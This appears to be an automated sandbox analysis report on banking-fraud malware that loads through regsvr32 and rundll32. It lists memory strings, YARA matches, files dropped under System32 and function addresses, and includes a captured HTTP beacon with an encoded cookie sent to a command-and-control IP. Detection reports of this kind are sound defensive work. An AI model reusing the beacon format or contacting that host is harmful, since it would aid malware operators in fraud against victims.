                      Source: svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.326665159.00000178ADE13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.326356261.00000178ADE56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.326356261.00000178ADE56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.304670979.00000178ADE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.304670979.00000178ADE31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326761792.00000178ADE3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000003.326284638.00000178ADE47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326835488.00000178ADE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001F.00000003.549191071.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549211947.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.550569503.000002B243986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549162134.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549145014.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549110590.000002B243999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 0000001F.00000003.549191071.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549211947.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.550569503.000002B243986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549162134.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549145014.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549110590.000002B243999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 0000001F.00000003.558126192.000002B2439D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558143997.000002B243999000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558158566.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558179115.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.558105558.000002B2439D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,6_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: PukgQ=fwT4jaWVXqy4FOPB16oF0T0i4Guh1rTeK46tPoYmMLU5jQJ2MP23iyeG23+aT2mppqe1SJ9h0NOytVHHb8WQxKPBWOrm+6NjR4uMnT5B/uDGQqh07xpdP9VxB+0aWEwwI7Dfj0bukq5mxXTBlziLQo7sgFudvOrhO8nHOvcJ3Yar8tI3U7SqI0HqiYLS9K9Umccxh2TITUrJPQ7dQFwEkgCTvmJOraCJo7ZdZWWbPXR6m3nIWr9dKCNlVFVxN8p+zSBKwb2tl4PP7v+OCx/66c3C7sIrrIRyEuZBo4MxgcZG9pgpyTA=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49746 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.198952a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.26800000000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.26800000000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1fd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.12f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.198952a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.12f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1fd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.280535060.0000026800000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.277397167.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.280399426.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.662769151.00000000012F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.280320668.00000198952A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\NaMuLvbxXsNvT\LkWax.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\FwsVMByehV\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7EB602_2_00007FFC66D7EB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7AF702_2_00007FFC66D7AF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7FB6C2_2_00007FFC66D7FB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D76F0C2_2_00007FFC66D76F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7E6C02_2_00007FFC66D7E6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7A77C2_2_00007FFC66D7A77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7895C2_2_00007FFC66D7895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D759442_2_00007FFC66D75944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7FCA02_2_00007FFC66D7FCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7AA0C2_2_00007FFC66D7AA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7B5CC2_2_00007FFC66D7B5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_006200002_2_00620000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF42_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C0582_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800091002_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C6082_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800216182_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE82_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800220102_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800118342_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC482_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC482_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800064582_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4602_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800298882_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA02_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A82_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB02_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B42_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B42_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800288B82_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024B82_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D8C42_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800250CC2_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D42_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017CE42_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800264F02_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800014F82_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020CFC2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C9042_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800179082_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800215102_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9172_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F1282_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD382_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F9442_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181482_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED502_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800131502_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D9502_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9602_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D602_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C9642_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D682_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D702_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800021782_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D802_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185982_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800035982_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A82_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A82_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B02_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B82_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C02_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C42_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D42_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E82_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800026102_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196182_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E282_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA382_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A2702_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E782_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA802_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800246982_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE982_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B82_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB82_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD02_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD82_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F02_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193002_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB042_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B102_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B282_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F282_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB282_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB302_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800203342_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800107582_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800293682_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800207682_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173782_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800137802_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800153882_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800027902_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A02_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B42_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB42_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C02_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C02_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010FF43_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180028C203_2_0000000180028C20
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C0583_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800091003_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800079583_2_0000000180007958
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C6083_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800216183_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013E283_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E3AC3_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DBE83_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FC0C3_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000580C3_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800220103_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001481C3_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A42C3_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800118343_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800238313_2_0000000180023831
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021C3C3_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000703C3_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000AC483_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000FC483_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800064583_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C05C3_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001A4603_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800298883_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D49C3_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008CA03_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800248A83_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015CB03_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800124B43_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C4B43_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800288B83_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024B83_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000D8C43_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800250CC3_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800190D43_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017CE43_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800264F03_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800014F83_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020CFC3_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C9043_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800179083_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800215103_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9173_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000551C3_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F1283_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CD383_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180016D3C3_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F9443_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800181483_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D9503_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800131503_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ED503_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E9603_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019D603_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C9643_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001D683_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001496C3_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002D703_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800021783_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024D803_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800185983_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800035983_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A9A83_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800119A83_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180025DAC3_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018DAC3_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800269B03_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800059B83_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800029BC3_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800141C03_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800125C43_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800121CC3_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800075D43_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800095DC3_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9E83_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800026103_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800196183_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FA383_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A2703_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019E783_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DA803_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800246983_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000EE983_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800176B83_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AAB83_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011AD03_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008AD83_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800296EC3_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A6EC3_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800132F03_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800193003_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BB043_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002870C3_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180026B103_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000131C3_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000671C3_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029B283_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180012F283_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000BB283_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EB303_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800203343_2_0000000180020334
